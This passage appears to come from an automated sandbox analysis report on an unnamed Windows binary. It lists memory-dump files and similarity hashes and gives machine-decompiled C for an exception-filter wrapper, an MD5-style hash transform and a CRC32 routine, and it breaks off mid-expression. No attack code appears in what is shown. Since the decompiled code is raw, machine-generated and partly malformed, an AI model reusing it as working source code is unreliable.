                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: x1A
                                                                                                                                                                      • API String ID: 0-1646630478
                                                                                                                                                                      • Opcode ID: fdc212910d03c255f0785c9543c6bfeff31382a250498d77613c5968644664cf
                                                                                                                                                                      • Instruction ID: 52bba8912795a97967905f55eeb4341e7272e8ac0bf7e2902004463dd3c3107f
                                                                                                                                                                      • Opcode Fuzzy Hash: fdc212910d03c255f0785c9543c6bfeff31382a250498d77613c5968644664cf
                                                                                                                                                                      • Instruction Fuzzy Hash: 4ED1D7716083528FC704CF28C4802AABBE2EFD5344F184A6EE9D5CB352D379D98ACB55
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004098F0, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004098F0() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter( *0x4170f0);
				 *0x4170f0 = 0;
				return _t1;
			}




                                                                                                                                                                      0x004098f6
                                                                                                                                                                      0x004098fc
                                                                                                                                                                      0x00409906

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004), ref: 004098F6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                      • Opcode ID: 31e70d09a190535cfca40eac8151b35d3e49dc34e543f2d84d890ba62a303ae5
                                                                                                                                                                      • Instruction ID: 58fd1e7f992a672593766b16f957b5939387e25e4684d50d9e98353aec796854
                                                                                                                                                                      • Opcode Fuzzy Hash: 31e70d09a190535cfca40eac8151b35d3e49dc34e543f2d84d890ba62a303ae5
                                                                                                                                                                      • Instruction Fuzzy Hash: 96B00178018352DBDB019F14FC0CBC43F72B748715F82C174941141274E7794458DA88
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040C838, Relevance: .7, Instructions: 674COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                      			E0040C838() {
				signed int* _t109;
				signed int _t111;
				intOrPtr _t328;
				signed int _t329;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t357;
				signed int _t359;
				signed int _t521;
				signed int _t526;
				signed int _t530;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				signed int _t541;
				signed int _t544;
				signed char* _t546;
				signed int _t550;
				signed int _t552;
				signed int _t554;
				signed int _t556;
				signed int _t562;
				signed int _t564;
				signed int _t567;
				signed int _t569;
				signed int _t571;
				signed int _t577;
				signed int _t579;
				signed int _t581;
				signed int _t583;
				signed int _t586;
				void* _t587;
				signed int _t590;
				signed int _t592;
				signed int _t595;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t605;
				signed int _t608;
				signed int _t610;
				signed int _t612;
				signed int _t614;
				signed int _t616;
				signed int _t618;
				signed int _t620;
				signed int _t622;
				intOrPtr* _t623;
				signed int* _t624;
				signed int _t625;
				signed int _t628;
				signed int _t630;
				signed int _t632;
				signed int _t634;
				signed int _t639;
				signed int _t641;
				signed int _t643;
				signed int _t651;
				signed int _t653;
				signed int _t655;
				signed int _t657;
				signed int _t659;
				signed int _t661;
				signed int _t663;
				signed int _t666;
				signed int _t671;
				signed int _t674;
				signed int _t677;
				signed int _t685;
				signed int _t688;
				signed int _t691;
				void* _t692;

				_t109 =  *(_t692 + 0x54);
				_t546 =  *((intOrPtr*)(_t692 + 0x58)) + 2;
				_t329 = _t109[1];
				_t671 = _t109[2];
				 *(_t692 + 0x14) =  *_t109;
				_t624 = _t692 + 0x24;
				 *(_t692 + 0x18) = _t109[3];
				_t587 = 0x10;
				do {
					_t359 = _t546[1] & 0x000000ff;
					_t111 =  *_t546 & 0x000000ff;
					_t546 =  &(_t546[4]);
					 *_t624 = ((_t359 << 0x00000008 | _t111) << 0x00000008 |  *(_t546 - 5) & 0x000000ff) << 0x00000008 |  *(_t546 - 6) & 0x000000ff;
					_t624 =  &(_t624[1]);
					_t587 = _t587 - 1;
				} while (_t587 != 0);
				_t625 =  *(_t692 + 0x14);
				asm("rol edx, 0x7");
				_t550 =  *((intOrPtr*)(_t692 + 0x10)) + 0xd76aa478 + ( !_t329 & _t625 | _t671 & _t329) +  *((intOrPtr*)(_t692 + 0x20)) + _t329;
				asm("rol esi, 0xc");
				_t628 = _t625 + 0xe8c7b756 + ( !_t550 & _t671 | _t329 & _t550) +  *(_t692 + 0x24) + _t550;
				asm("ror edi, 0xf");
				_t590 = _t671 + 0x242070db + ( !_t628 & _t329 | _t628 & _t550) +  *((intOrPtr*)(_t692 + 0x28)) + _t628;
				asm("ror ebx, 0xa");
				_t332 = _t329 + 0xc1bdceee + ( !_t590 & _t550 | _t628 & _t590) +  *((intOrPtr*)(_t692 + 0x2c)) + _t590;
				asm("rol edx, 0x7");
				_t552 = _t550 + ( !_t332 & _t628 | _t590 & _t332) + 0xf57c0faf +  *((intOrPtr*)(_t692 + 0x30)) + _t332;
				asm("rol esi, 0xc");
				_t630 = _t628 + ( !_t552 & _t590 | _t332 & _t552) + 0x4787c62a +  *((intOrPtr*)(_t692 + 0x34)) + _t552;
				asm("ror edi, 0xf");
				_t592 = _t590 + ( !_t630 & _t332 | _t630 & _t552) + 0xa8304613 +  *((intOrPtr*)(_t692 + 0x38)) + _t630;
				asm("ror ebx, 0xa");
				_t334 = _t332 + ( !_t592 & _t552 | _t630 & _t592) + 0xfd469501 +  *((intOrPtr*)(_t692 + 0x3c)) + _t592;
				asm("rol edx, 0x7");
				_t554 = _t552 + ( !_t334 & _t630 | _t592 & _t334) + 0x698098d8 +  *((intOrPtr*)(_t692 + 0x40)) + _t334;
				_t27 = _t554 + 0x6b901122; // -1809486614
				asm("rol esi, 0xc");
				_t632 = _t630 + ( !_t554 & _t592 | _t334 & _t554) + 0x8b44f7af +  *((intOrPtr*)(_t692 + 0x44)) + _t554;
				asm("ror ebp, 0xf");
				_t674 = _t592 - 0xa44f + ( !_t632 & _t334 | _t632 & _t554) +  *((intOrPtr*)(_t692 + 0x48)) + _t632;
				 *(_t692 + 0x14) = _t674;
				asm("ror ebx, 0xa");
				_t336 = _t334 + ( !_t674 & _t554 | _t632 & _t674) + 0x895cd7be +  *((intOrPtr*)(_t692 + 0x4c)) + _t674;
				 *(_t692 + 0x18) = _t336;
				asm("rol edi, 0x7");
				_t595 = _t27 + ( !_t336 & _t632 | _t674 & _t336) +  *((intOrPtr*)(_t692 + 0x50)) + _t336;
				 *(_t692 + 0x1c) = _t595;
				asm("rol ebp, 0xc");
				_t677 = _t632 - 0x2678e6d +  *(_t692 + 0x54) + ( !_t595 & _t674 | _t336 & _t595) + _t595;
				_t634 =  !_t677;
				asm("ror ebx, 0xf");
				_t340 =  *(_t692 + 0x14) + 0xa679438e + (_t634 & _t336 | _t677 & _t595) +  *((intOrPtr*)(_t692 + 0x58)) + _t677;
				_t556 =  !_t340;
				asm("ror edi, 0xa");
				_t599 =  *(_t692 + 0x18) + 0x49b40821 + (_t556 & _t595 | _t677 & _t340) +  *((intOrPtr*)(_t692 + 0x5c)) + _t340;
				asm("rol esi, 0x5");
				_t639 = (_t634 & _t340 | _t677 & _t599) +  *(_t692 + 0x24) +  *(_t692 + 0x1c) + 0xf61e2562 + _t599;
				asm("rol edx, 0x9");
				_t562 = (_t556 & _t599 | _t340 & _t639) + 0xc040b340 +  *((intOrPtr*)(_t692 + 0x38)) + _t677 + _t639;
				asm("rol ebx, 0xe");
				_t342 = _t340 + ( !_t599 & _t639 | _t562 & _t599) + 0x265e5a51 +  *((intOrPtr*)(_t692 + 0x4c)) + _t562;
				asm("ror edi, 0xc");
				_t601 = _t599 + ( !_t639 & _t562 | _t342 & _t639) + 0xe9b6c7aa +  *((intOrPtr*)(_t692 + 0x20)) + _t342;
				asm("rol esi, 0x5");
				_t641 = _t639 + ( !_t562 & _t342 | _t562 & _t601) + 0xd62f105d +  *((intOrPtr*)(_t692 + 0x34)) + _t601;
				asm("rol edx, 0x9");
				_t564 = _t562 + ( !_t342 & _t601 | _t342 & _t641) + 0x2441453 +  *((intOrPtr*)(_t692 + 0x48)) + _t641;
				asm("rol ebx, 0xe");
				_t344 = _t342 + ( !_t601 & _t641 | _t564 & _t601) + 0xd8a1e681 +  *((intOrPtr*)(_t692 + 0x5c)) + _t564;
				asm("ror edi, 0xc");
				_t603 = _t601 + ( !_t641 & _t564 | _t344 & _t641) + 0xe7d3fbc8 +  *((intOrPtr*)(_t692 + 0x30)) + _t344;
				asm("rol esi, 0x5");
				_t643 = _t641 + ( !_t564 & _t344 | _t564 & _t603) + 0x21e1cde6 +  *((intOrPtr*)(_t692 + 0x44)) + _t603;
				asm("rol ebp, 0x9");
				_t685 = ( !_t344 & _t603 | _t344 & _t643) + 0xc33707d6 +  *((intOrPtr*)(_t692 + 0x58)) + _t564 + _t643;
				asm("rol ebx, 0xe");
				_t346 = _t344 + ( !_t603 & _t643 | _t685 & _t603) + 0xf4d50d87 +  *((intOrPtr*)(_t692 + 0x2c)) + _t685;
				asm("ror edi, 0xc");
				_t605 = _t603 + ( !_t643 & _t685 | _t346 & _t643) + 0x455a14ed +  *((intOrPtr*)(_t692 + 0x40)) + _t346;
				 *(_t692 + 0x1c) = _t605;
				asm("rol edx, 0x5");
				_t567 = _t643 - 0x561c16fb +  *(_t692 + 0x54) + ( !_t685 & _t346 | _t685 & _t605) + _t605;
				asm("rol esi, 0x9");
				_t651 = ( !_t346 & _t605 | _t346 & _t567) + 0xfcefa3f8 +  *((intOrPtr*)(_t692 + 0x28)) + _t685 + _t567;
				asm("rol edi, 0xe");
				_t608 = _t346 + 0x676f02d9 + ( !_t605 & _t567 | _t651 & _t605) +  *((intOrPtr*)(_t692 + 0x3c)) + _t651;
				asm("ror ebx, 0xc");
				_t350 =  *(_t692 + 0x1c) + 0x8d2a4c8a + ( !_t567 & _t651 | _t608 & _t567) +  *((intOrPtr*)(_t692 + 0x50)) + _t608;
				asm("rol edx, 0x4");
				_t569 = _t567 + (_t651 ^ _t608 ^ _t350) + 0xfffa3942 +  *((intOrPtr*)(_t692 + 0x34)) + _t350;
				asm("rol esi, 0xb");
				_t653 = _t651 + (_t608 ^ _t350 ^ _t569) + 0x8771f681 +  *((intOrPtr*)(_t692 + 0x40)) + _t569;
				asm("rol edi, 0x10");
				_t610 = _t608 + (_t653 ^ _t350 ^ _t569) + 0x6d9d6122 +  *((intOrPtr*)(_t692 + 0x4c)) + _t653;
				_t521 = _t653 ^ _t610;
				asm("ror ebx, 0x9");
				_t352 = _t350 + (_t521 ^ _t569) + 0xfde5380c +  *((intOrPtr*)(_t692 + 0x58)) + _t610;
				asm("rol edx, 0x4");
				_t571 = _t569 + (_t521 ^ _t352) + 0xa4beea44 +  *(_t692 + 0x24) + _t352;
				asm("rol esi, 0xb");
				_t655 = _t653 + (_t610 ^ _t352 ^ _t571) + 0x4bdecfa9 +  *((intOrPtr*)(_t692 + 0x30)) + _t571;
				asm("rol edi, 0x10");
				_t612 = _t610 + (_t655 ^ _t352 ^ _t571) + 0xf6bb4b60 +  *((intOrPtr*)(_t692 + 0x3c)) + _t655;
				_t526 = _t655 ^ _t612;
				asm("ror ebx, 0x9");
				_t354 = _t352 + (_t526 ^ _t571) + 0xbebfbc70 +  *((intOrPtr*)(_t692 + 0x48)) + _t612;
				asm("rol ebp, 0x4");
				_t688 = _t571 + 0x289b7ec6 +  *(_t692 + 0x54) + (_t526 ^ _t354) + _t354;
				asm("rol esi, 0xb");
				_t657 = _t655 + (_t612 ^ _t354 ^ _t688) + 0xeaa127fa +  *((intOrPtr*)(_t692 + 0x20)) + _t688;
				asm("rol edi, 0x10");
				_t614 = _t612 + (_t657 ^ _t354 ^ _t688) + 0xd4ef3085 +  *((intOrPtr*)(_t692 + 0x2c)) + _t657;
				_t530 = _t657 ^ _t614;
				asm("ror edx, 0x9");
				_t577 = (_t530 ^ _t688) + 0x4881d05 +  *((intOrPtr*)(_t692 + 0x38)) + _t354 + _t614;
				asm("rol ecx, 0x4");
				_t535 = (_t530 ^ _t577) + 0xd9d4d039 +  *((intOrPtr*)(_t692 + 0x44)) + _t688 + _t577;
				asm("rol esi, 0xb");
				_t659 = _t657 + (_t614 ^ _t577 ^ _t535) + 0xe6db99e5 +  *((intOrPtr*)(_t692 + 0x50)) + _t535;
				asm("rol edi, 0x10");
				_t616 = _t614 + (_t659 ^ _t577 ^ _t535) + 0x1fa27cf8 +  *((intOrPtr*)(_t692 + 0x5c)) + _t659;
				asm("ror edx, 0x9");
				_t579 = _t577 + (_t659 ^ _t616 ^ _t535) + 0xc4ac5665 +  *((intOrPtr*)(_t692 + 0x28)) + _t616;
				asm("rol ecx, 0x6");
				_t537 = _t535 + (( !_t659 | _t579) ^ _t616) + 0xf4292244 +  *((intOrPtr*)(_t692 + 0x20)) + _t579;
				asm("rol esi, 0xa");
				_t661 = _t659 + (( !_t616 | _t537) ^ _t579) + 0x432aff97 +  *((intOrPtr*)(_t692 + 0x3c)) + _t537;
				asm("rol edi, 0xf");
				_t618 = _t616 + (( !_t579 | _t661) ^ _t537) + 0xab9423a7 +  *((intOrPtr*)(_t692 + 0x58)) + _t661;
				asm("ror edx, 0xb");
				_t581 = _t579 + (( !_t537 | _t618) ^ _t661) + 0xfc93a039 +  *((intOrPtr*)(_t692 + 0x34)) + _t618;
				asm("rol ecx, 0x6");
				_t539 = _t537 + (( !_t661 | _t581) ^ _t618) + 0x655b59c3 +  *((intOrPtr*)(_t692 + 0x50)) + _t581;
				asm("rol esi, 0xa");
				_t663 = _t661 + (( !_t618 | _t539) ^ _t581) + 0x8f0ccc92 +  *((intOrPtr*)(_t692 + 0x2c)) + _t539;
				asm("rol edi, 0xf");
				_t620 = _t618 + (( !_t581 | _t663) ^ _t539) + 0xffeff47d +  *((intOrPtr*)(_t692 + 0x48)) + _t663;
				asm("ror edx, 0xb");
				_t583 = _t581 + (( !_t539 | _t620) ^ _t663) + 0x85845dd1 +  *(_t692 + 0x24) + _t620;
				asm("rol ecx, 0x6");
				_t541 = _t539 + (( !_t663 | _t583) ^ _t620) + 0x6fa87e4f +  *((intOrPtr*)(_t692 + 0x40)) + _t583;
				asm("rol ebx, 0xa");
				_t357 = _t663 - 0x1d31920 + (( !_t620 | _t541) ^ _t583) +  *((intOrPtr*)(_t692 + 0x5c)) + _t541;
				asm("rol edi, 0xf");
				_t622 = _t620 + (( !_t583 | _t357) ^ _t541) + 0xa3014314 +  *((intOrPtr*)(_t692 + 0x38)) + _t357;
				asm("ror ebp, 0xb");
				_t691 = _t583 + 0x4e0811a1 +  *(_t692 + 0x54) + (( !_t541 | _t622) ^ _t357) + _t622;
				_t623 =  *((intOrPtr*)(_t692 + 0x64));
				asm("rol esi, 0x6");
				_t666 = _t541 - 0x8ac817e + (( !_t357 | _t691) ^ _t622) +  *((intOrPtr*)(_t692 + 0x30)) + _t691;
				asm("rol edx, 0xa");
				_t586 = _t357 - 0x42c50dcb + (( !_t622 | _t666) ^ _t691) +  *((intOrPtr*)(_t692 + 0x4c)) + _t666;
				asm("rol ecx, 0xf");
				_t544 = _t622 + 0x2ad7d2bb + (( !_t691 | _t586) ^ _t666) +  *((intOrPtr*)(_t692 + 0x28)) + _t586;
				 *_t623 =  *((intOrPtr*)(_t692 + 0x10)) + _t666;
				 *((intOrPtr*)(_t623 + 8)) =  *((intOrPtr*)(_t623 + 8)) + _t544;
				asm("ror eax, 0xb");
				_t328 = _t691 - 0x14792c6f + (( !_t666 | _t544) ^ _t586) +  *((intOrPtr*)(_t692 + 0x44)) +  *((intOrPtr*)(_t623 + 4)) + _t544;
				 *((intOrPtr*)(_t623 + 0xc)) =  *((intOrPtr*)(_t623 + 0xc)) + _t586;
				 *((intOrPtr*)(_t623 + 4)) = _t328;
				return _t328;
			}



















































































                                                                                                                                                                      0x0040c83b
                                                                                                                                                                      0x0040c847
                                                                                                                                                                      0x0040c84a
                                                                                                                                                                      0x0040c84d
                                                                                                                                                                      0x0040c857
                                                                                                                                                                      0x0040c85b
                                                                                                                                                                      0x0040c85f
                                                                                                                                                                      0x0040c863
                                                                                                                                                                      0x0040c864
                                                                                                                                                                      0x0040c864
                                                                                                                                                                      0x0040c868
                                                                                                                                                                      0x0040c86b
                                                                                                                                                                      0x0040c885
                                                                                                                                                                      0x0040c887
                                                                                                                                                                      0x0040c88a
                                                                                                                                                                      0x0040c88a
                                                                                                                                                                      0x0040c88d
                                                                                                                                                                      0x0040c8bb
                                                                                                                                                                      0x0040c8be
                                                                                                                                                                      0x0040c8d0
                                                                                                                                                                      0x0040c8d3
                                                                                                                                                                      0x0040c8ef
                                                                                                                                                                      0x0040c8f2
                                                                                                                                                                      0x0040c906
                                                                                                                                                                      0x0040c909
                                                                                                                                                                      0x0040c923
                                                                                                                                                                      0x0040c926
                                                                                                                                                                      0x0040c93e
                                                                                                                                                                      0x0040c941
                                                                                                                                                                      0x0040c95b
                                                                                                                                                                      0x0040c95e
                                                                                                                                                                      0x0040c980
                                                                                                                                                                      0x0040c983
                                                                                                                                                                      0x0040c99d
                                                                                                                                                                      0x0040c9a0
                                                                                                                                                                      0x0040c9ac
                                                                                                                                                                      0x0040c9be
                                                                                                                                                                      0x0040c9c1
                                                                                                                                                                      0x0040c9d7
                                                                                                                                                                      0x0040c9da
                                                                                                                                                                      0x0040c9de
                                                                                                                                                                      0x0040c9f8
                                                                                                                                                                      0x0040c9fb
                                                                                                                                                                      0x0040c9ff
                                                                                                                                                                      0x0040ca13
                                                                                                                                                                      0x0040ca16
                                                                                                                                                                      0x0040ca1a
                                                                                                                                                                      0x0040ca32
                                                                                                                                                                      0x0040ca35
                                                                                                                                                                      0x0040ca39
                                                                                                                                                                      0x0040ca57
                                                                                                                                                                      0x0040ca5a
                                                                                                                                                                      0x0040ca60
                                                                                                                                                                      0x0040ca7c
                                                                                                                                                                      0x0040ca7f
                                                                                                                                                                      0x0040ca9c
                                                                                                                                                                      0x0040ca9f
                                                                                                                                                                      0x0040cab3
                                                                                                                                                                      0x0040cab6
                                                                                                                                                                      0x0040cace
                                                                                                                                                                      0x0040cad3
                                                                                                                                                                      0x0040caed
                                                                                                                                                                      0x0040caf2
                                                                                                                                                                      0x0040cb08
                                                                                                                                                                      0x0040cb0d
                                                                                                                                                                      0x0040cb25
                                                                                                                                                                      0x0040cb2a
                                                                                                                                                                      0x0040cb42
                                                                                                                                                                      0x0040cb47
                                                                                                                                                                      0x0040cb65
                                                                                                                                                                      0x0040cb6a
                                                                                                                                                                      0x0040cb82
                                                                                                                                                                      0x0040cb87
                                                                                                                                                                      0x0040cba1
                                                                                                                                                                      0x0040cba4
                                                                                                                                                                      0x0040cbbc
                                                                                                                                                                      0x0040cbc1
                                                                                                                                                                      0x0040cbd9
                                                                                                                                                                      0x0040cbde
                                                                                                                                                                      0x0040cbe4
                                                                                                                                                                      0x0040cbf2
                                                                                                                                                                      0x0040cbf5
                                                                                                                                                                      0x0040cc13
                                                                                                                                                                      0x0040cc16
                                                                                                                                                                      0x0040cc36
                                                                                                                                                                      0x0040cc3b
                                                                                                                                                                      0x0040cc4f
                                                                                                                                                                      0x0040cc52
                                                                                                                                                                      0x0040cc65
                                                                                                                                                                      0x0040cc68
                                                                                                                                                                      0x0040cc77
                                                                                                                                                                      0x0040cc7a
                                                                                                                                                                      0x0040cc8f
                                                                                                                                                                      0x0040cc92
                                                                                                                                                                      0x0040cc94
                                                                                                                                                                      0x0040cca7
                                                                                                                                                                      0x0040ccaa
                                                                                                                                                                      0x0040ccbc
                                                                                                                                                                      0x0040ccbf
                                                                                                                                                                      0x0040ccce
                                                                                                                                                                      0x0040ccd7
                                                                                                                                                                      0x0040ccec
                                                                                                                                                                      0x0040ccef
                                                                                                                                                                      0x0040ccf1
                                                                                                                                                                      0x0040cd04
                                                                                                                                                                      0x0040cd07
                                                                                                                                                                      0x0040cd13
                                                                                                                                                                      0x0040cd16
                                                                                                                                                                      0x0040cd25
                                                                                                                                                                      0x0040cd28
                                                                                                                                                                      0x0040cd3d
                                                                                                                                                                      0x0040cd40
                                                                                                                                                                      0x0040cd42
                                                                                                                                                                      0x0040cd56
                                                                                                                                                                      0x0040cd59
                                                                                                                                                                      0x0040cd6b
                                                                                                                                                                      0x0040cd6e
                                                                                                                                                                      0x0040cd7d
                                                                                                                                                                      0x0040cd80
                                                                                                                                                                      0x0040cd95
                                                                                                                                                                      0x0040cd98
                                                                                                                                                                      0x0040cdab
                                                                                                                                                                      0x0040cdae
                                                                                                                                                                      0x0040cdc5
                                                                                                                                                                      0x0040cdc8
                                                                                                                                                                      0x0040cddd
                                                                                                                                                                      0x0040cde0
                                                                                                                                                                      0x0040cdf5
                                                                                                                                                                      0x0040cdf8
                                                                                                                                                                      0x0040ce0d
                                                                                                                                                                      0x0040ce10
                                                                                                                                                                      0x0040ce25
                                                                                                                                                                      0x0040ce28
                                                                                                                                                                      0x0040ce3d
                                                                                                                                                                      0x0040ce40
                                                                                                                                                                      0x0040ce55
                                                                                                                                                                      0x0040ce58
                                                                                                                                                                      0x0040ce6d
                                                                                                                                                                      0x0040ce70
                                                                                                                                                                      0x0040ce83
                                                                                                                                                                      0x0040ce86
                                                                                                                                                                      0x0040ceaa
                                                                                                                                                                      0x0040cead
                                                                                                                                                                      0x0040cec8
                                                                                                                                                                      0x0040cecb
                                                                                                                                                                      0x0040cedd
                                                                                                                                                                      0x0040cee4
                                                                                                                                                                      0x0040cef4
                                                                                                                                                                      0x0040cef8
                                                                                                                                                                      0x0040cefb
                                                                                                                                                                      0x0040cf0b
                                                                                                                                                                      0x0040cf0e
                                                                                                                                                                      0x0040cf20
                                                                                                                                                                      0x0040cf23
                                                                                                                                                                      0x0040cf25
                                                                                                                                                                      0x0040cf27
                                                                                                                                                                      0x0040cf3c
                                                                                                                                                                      0x0040cf42
                                                                                                                                                                      0x0040cf44
                                                                                                                                                                      0x0040cf47
                                                                                                                                                                      0x0040cf51

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                                                                                                                                                                      • Instruction ID: 6ef1de5262991055bf8ff344baa4316f75fa1d5ea4f76780d655809ec32a4ba1
                                                                                                                                                                      • Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                                                                                                                                                                      • Instruction Fuzzy Hash: 8812B5B3B546144BD70CCE1DCCA23A9B2D3ABD4218B0E853DB48AD3341EA7DD9198685
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004102F0, Relevance: .2, Instructions: 209COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004102F0() {
				signed int _t98;
				signed char _t103;
				signed char _t150;
				unsigned int _t152;
				signed char _t167;
				signed int _t178;
				signed int _t213;
				signed int* _t257;
				signed char* _t258;
				unsigned int _t259;
				unsigned int _t262;
				void* _t264;

				_t214 =  *(_t264 + 4);
				_t150 =  *(_t264 + 0xc);
				_t259 =  *(_t264 + 0x14);
				_t98 =  !((( *(_t264 + 4) & 0x0000ff00) + ( *(_t264 + 4) << 0x10) << 8) + (_t214 >> 0x00000008 & 0x0000ff00) + (_t214 >> 0x18));
				if(_t259 != 0) {
					while((_t150 & 0x00000003) != 0) {
						_t213 =  *_t150 & 0x000000ff;
						_t150 = _t150 + 1;
						_t98 = _t98 << 0x00000008 ^  *(0x4141c8 + (_t98 >> 0x00000018 ^ _t213) * 4);
						_t259 = _t259 - 1;
						if(_t259 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				_t257 = _t150 - 4;
				if(_t259 >= 0x20) {
					_t262 = _t259 >> 5;
					do {
						_t248 =  *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 